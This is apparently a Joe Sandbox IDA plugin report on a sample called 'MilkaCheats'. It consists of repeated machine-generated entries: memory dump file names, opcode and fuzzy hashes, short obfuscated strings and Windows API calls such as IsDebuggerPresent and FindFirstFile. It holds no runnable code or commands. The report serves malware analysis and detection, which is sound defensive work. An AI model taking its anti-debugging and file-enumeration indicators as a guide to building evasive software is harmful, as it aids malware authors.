                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                              • String ID:
                                                                                              • API String ID: 1164774033-0
                                                                                              • Opcode ID: ca17a6c517a96d0795f690f0f44bd832864b2c3515e43ede4314953752c1c877
                                                                                              • Instruction ID: dc820255847f1e01925d35832b7b6a94106dc711285bb5cbd44433719ed4a6e2
                                                                                              • Opcode Fuzzy Hash: ca17a6c517a96d0795f690f0f44bd832864b2c3515e43ede4314953752c1c877
                                                                                              • Instruction Fuzzy Hash: FA71C4759053689EDF60EF648C89AFEB7B9AF05304F1541DAE448A7312DB358EC49F20
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 000C778B
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 000C7857
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000C7870
                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 000C787A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 254469556-0
                                                                                              • Opcode ID: ad6c37f4942485ad8a7463fd3be0afcfb481515de777c3c6b03cbe76614946ba
                                                                                              • Instruction ID: 7098c7b6664491901188d75b757daa66a064b4781595bd9d9688a54ba1e5279c
                                                                                              • Opcode Fuzzy Hash: ad6c37f4942485ad8a7463fd3be0afcfb481515de777c3c6b03cbe76614946ba
                                                                                              • Instruction Fuzzy Hash: 6731F775D052189BDF60EFA4D989BCDBBB8BF08700F1041AAE50CAB250EB759A85CF45
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: lcw|<a$o~{q$w|<a${{up
                                                                                              • API String ID: 0-3972657743
                                                                                              • Opcode ID: ee1d4c4be59772c9dc4ba5ef2cc83ec8845917b8600013c03d7c0a4548024979
                                                                                              • Instruction ID: 05e46a85f6f71d5bac69d3b7b7b182a6825350390a5d4fc126ec06cd51a07652
                                                                                              • Opcode Fuzzy Hash: ee1d4c4be59772c9dc4ba5ef2cc83ec8845917b8600013c03d7c0a4548024979
                                                                                              • Instruction Fuzzy Hash: ABA17A716047428FE7298F64C8807A2FBE2FF65314F28866DD8A60B7D2D335E846C791
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 3768$:?-)$i7b0$~x||
                                                                                              • API String ID: 0-4241966085
                                                                                              • Opcode ID: 5710efa4951a73522a1cd609604e5c6ba47521d46e43b5ec33226a688e5db37e
                                                                                              • Instruction ID: f1a86c42a3739d65a2815bc074c23511cca905313e54b739e296ac7ec952e331
                                                                                              • Opcode Fuzzy Hash: 5710efa4951a73522a1cd609604e5c6ba47521d46e43b5ec33226a688e5db37e
                                                                                              • Instruction Fuzzy Hash: 822178B460D3808BD3648F29949025BBFE2ABD2324F644A2DF0E14B394D3798486CF07
                                                                                              APIs
                                                                                                • Part of subcall function 000D4200: GetLastError.KERNEL32(?,00000008,000D9825,00000000,000CB670), ref: 000D4204
                                                                                                • Part of subcall function 000D4200: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 000D42A6
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000DDFA8
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000DDFF2
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000DE0B8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocale$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 661929714-0
                                                                                              • Opcode ID: f1fdc1bd936ddaa8de4a38de7db1f1d7ce3f4854a81bf81d83ce231182c28ba2
                                                                                              • Instruction ID: 46538fe474f9652df572cb245f90a0ccebcba77ec9ac9794bd6915362ce634e6
                                                                                              • Opcode Fuzzy Hash: f1fdc1bd936ddaa8de4a38de7db1f1d7ce3f4854a81bf81d83ce231182c28ba2
                                                                                              • Instruction Fuzzy Hash: 4761A375A10347AFEB64AF24CC82BBA77E8EF04300F14417AE915CA385E774E995CB60
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 000CB5EB
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 000CB5F5
                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 000CB602
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID:
                                                                                              • API String ID: 3906539128-0
                                                                                              • Opcode ID: 4fafd887d82510f826443e65c1f7c70a03995d1419e714cc0c077d1657b2d84c
                                                                                              • Instruction ID: 3b40cfa9f2b610c07a7b626e4d1422f3a5c26505efad7e3c875d138824c2a744
                                                                                              • Opcode Fuzzy Hash: 4fafd887d82510f826443e65c1f7c70a03995d1419e714cc0c077d1657b2d84c
                                                                                              • Instruction Fuzzy Hash: D931C5759012289BCB61DF68DD89BCCBBB8BF08710F5041EAE50CA7251EB749F858F45
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: %*+($InA>$P
                                                                                              • API String ID: 0-1283304554
                                                                                              • Opcode ID: 69c79a69b68684340418c6de6c15f7cefbd510847b5e62cf76ade11209e71bc7
                                                                                              • Instruction ID: d56f0d100e75be20df71cd939511cc4fb01e54f0c720f5c513da00c335289c75
                                                                                              • Opcode Fuzzy Hash: 69c79a69b68684340418c6de6c15f7cefbd510847b5e62cf76ade11209e71bc7
                                                                                              • Instruction Fuzzy Hash: 8EE107725083648FD325CF28985076FBBE1EBC5714F158A2CE9A99B391CB74D906CBC2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: -$gfff$gfff
                                                                                              • API String ID: 0-837351935
                                                                                              • Opcode ID: d4127b2774f59aa8715d81dbccfbb22cbe20e6c1cd757104035fa32d46f19a6e
                                                                                              • Instruction ID: 62ff869091370c397b4fb060e81e1f8ab08820eb4742a2230df92582868f1c4e
                                                                                              • Opcode Fuzzy Hash: d4127b2774f59aa8715d81dbccfbb22cbe20e6c1cd757104035fa32d46f19a6e
                                                                                              • Instruction Fuzzy Hash: 94E1C07160C3968FC715CF29C48026AFFE1AFD9304F088A6DE9D997392D234D949DB52
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: "MO$40,G$L]IN
                                                                                              • API String ID: 0-2812748645
                                                                                              • Opcode ID: 4f1db071aef4295662c013afa0dc9ca3fed0ae4f3ff53a7c54eade7df3650f13
                                                                                              • Instruction ID: 357b751a5244f858f420f21ee8c5388745614c9477c0208beaab716827a066ef
                                                                                              • Opcode Fuzzy Hash: 4f1db071aef4295662c013afa0dc9ca3fed0ae4f3ff53a7c54eade7df3650f13
                                                                                              • Instruction Fuzzy Hash: E4A104705047818BD329CF29C490762BBE2BF96314F288AADD4E68BB56C375E846CB50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: DE$[Y$j
                                                                                              • API String ID: 0-2398809664
                                                                                              • Opcode ID: 3195f798ee7a60e65a6da30117195d18f93f3a46813107e3d2f9de05ccdc6560
                                                                                              • Instruction ID: f466fb6de07c5baf61ccd92a4898a56a9fb37119da90d3c8fb6c7b80e948e3d0
                                                                                              • Opcode Fuzzy Hash: 3195f798ee7a60e65a6da30117195d18f93f3a46813107e3d2f9de05ccdc6560
                                                                                              • Instruction Fuzzy Hash: A791CDB651D3508BC314CF25C89125BBBE2FFD5318F19892CE4D84B791E3B58909CB96
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: "MO$40,G$L]IN
                                                                                              • API String ID: 0-2812748645
                                                                                              • Opcode ID: 247fc5e750414c71ecc7bf8a2d624936bbbcfbf24d0cf7726668f12528fce844
                                                                                              • Instruction ID: b48714b760911ec2a50eb0053472aa7024cea6f458267a8f853865e3de123e73
                                                                                              • Opcode Fuzzy Hash: 247fc5e750414c71ecc7bf8a2d624936bbbcfbf24d0cf7726668f12528fce844
                                                                                              • Instruction Fuzzy Hash: 4B8104B15047818FD325CF2AC490762BBE2BF96304F2885ADD4EA4F746C3759447CBA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: "MO$40,G$L]IN
                                                                                              • API String ID: 0-2812748645
                                                                                              • Opcode ID: ec70a32ffddd1b3cb99e7deab79c47f689cc4c32e37e9b6c9503c84adadaa294
                                                                                              • Instruction ID: 7fb804796739e409c2011b26963aba020c9d35702a273410cf5f9ad5b70b7c7c
                                                                                              • Opcode Fuzzy Hash: ec70a32ffddd1b3cb99e7deab79c47f689cc4c32e37e9b6c9503c84adadaa294
                                                                                              • Instruction Fuzzy Hash: D881F3B15047818FD325CF2AC490762BBE2BF96304F2886ADD4E64F756C379A447CBA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Ehrd$n|of$txLL
                                                                                              • API String ID: 0-1271805156
                                                                                              • Opcode ID: 5fd7a7faba47377d064207015be6ba4ced17ca23ba9f116e194c90821bd06350
                                                                                              • Instruction ID: 2eafb8f9f217e2a20e298c7bccfc05103bd522bee07e6f155cb56ada1f2e78e3
                                                                                              • Opcode Fuzzy Hash: 5fd7a7faba47377d064207015be6ba4ced17ca23ba9f116e194c90821bd06350
                                                                                              • Instruction Fuzzy Hash: 2D31BF7410C3848FD3508F1596E266FBFE1EB82B50F28096CE0D69B711C339CA0A9F96
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 276b97fbd984da2656be2fafbcceb2476177e29d667066f5566847cfd156f8c7
                                                                                              • Instruction ID: 62dd5e5e0b48d7808f7f0ac974c389bdf67b7794094eeb393178b94719b4fccf
                                                                                              • Opcode Fuzzy Hash: 276b97fbd984da2656be2fafbcceb2476177e29d667066f5566847cfd156f8c7
                                                                                              • Instruction Fuzzy Hash: CBF12C71E012199FDF14CF69D880BAEB7F1FF88314F15826AE819AB381D731A9458F94
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $96w$c]
                                                                                              • API String ID: 0-247510824
                                                                                              • Opcode ID: de7722bf3c73c5b83954ba33a282ced62fba462950f44f3f88abc5f38a6182ab
                                                                                              • Instruction ID: 06e3f9c68ac5a955f60a19fb18d6ad5edb05c2f56d617e9596b43b46188f232c
                                                                                              • Opcode Fuzzy Hash: de7722bf3c73c5b83954ba33a282ced62fba462950f44f3f88abc5f38a6182ab
                                                                                              • Instruction Fuzzy Hash: 5B22C0756083419BD728CF24D881BAFB7E2EBD8714F15893CF68987291D771E881CB92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: `$c
                                                                                              • API String ID: 0-1220095849
                                                                                              • Opcode ID: 5c608a1e2e721dabdcaeeddb8a4bb7f1cc7d9f0b7b683d9c8b8af8142caded02
                                                                                              • Instruction ID: d6df85fbac8cfff1b2b33659c9d4e842e9160eb7cfdd4ade90b64e15b2356aee
                                                                                              • Opcode Fuzzy Hash: 5c608a1e2e721dabdcaeeddb8a4bb7f1cc7d9f0b7b683d9c8b8af8142caded02
                                                                                              • Instruction Fuzzy Hash: 20D1E271A08340ABD7059F24E842AEFBBE9DBD6310F19882CF98497242D775DC49DB93
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: %*+($%*+(
                                                                                              • API String ID: 0-3039692684
                                                                                              • Opcode ID: 3edc26f54fc6f96b6ac74da4b34a405f423cdfc7cfe90740567c3347860ca026
                                                                                              • Instruction ID: 44789c02e2e7d0d1226e767c2045b81580b18e5bc0f483827717c83eae5518b6
                                                                                              • Opcode Fuzzy Hash: 3edc26f54fc6f96b6ac74da4b34a405f423cdfc7cfe90740567c3347860ca026
                                                                                              • Instruction Fuzzy Hash: 3AA137357083109BD729CB68DC91BABB7E1EB8C314F14893DE985D7292EB34E940C792
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0$8
                                                                                              • API String ID: 0-46163386
                                                                                              • Opcode ID: 838afa22ea1f7ffa5fe9ba21136936bdf1f17e628c4be68406256da8559593a0
                                                                                              • Instruction ID: 59a405dd1b0cd974e97d72f778238365ab1aca3e8b068c1f4b250f498252b91a
                                                                                              • Opcode Fuzzy Hash: 838afa22ea1f7ffa5fe9ba21136936bdf1f17e628c4be68406256da8559593a0
                                                                                              • Instruction Fuzzy Hash: 6D31D23660D3858FD311CA68C48469FFBE2AFEA354F48895DE4C497352CA74D909CB92
                                                                                              APIs
                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,000D4E0E,?,?,00000008,?,?,000E34B0,00000000), ref: 000D5040
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
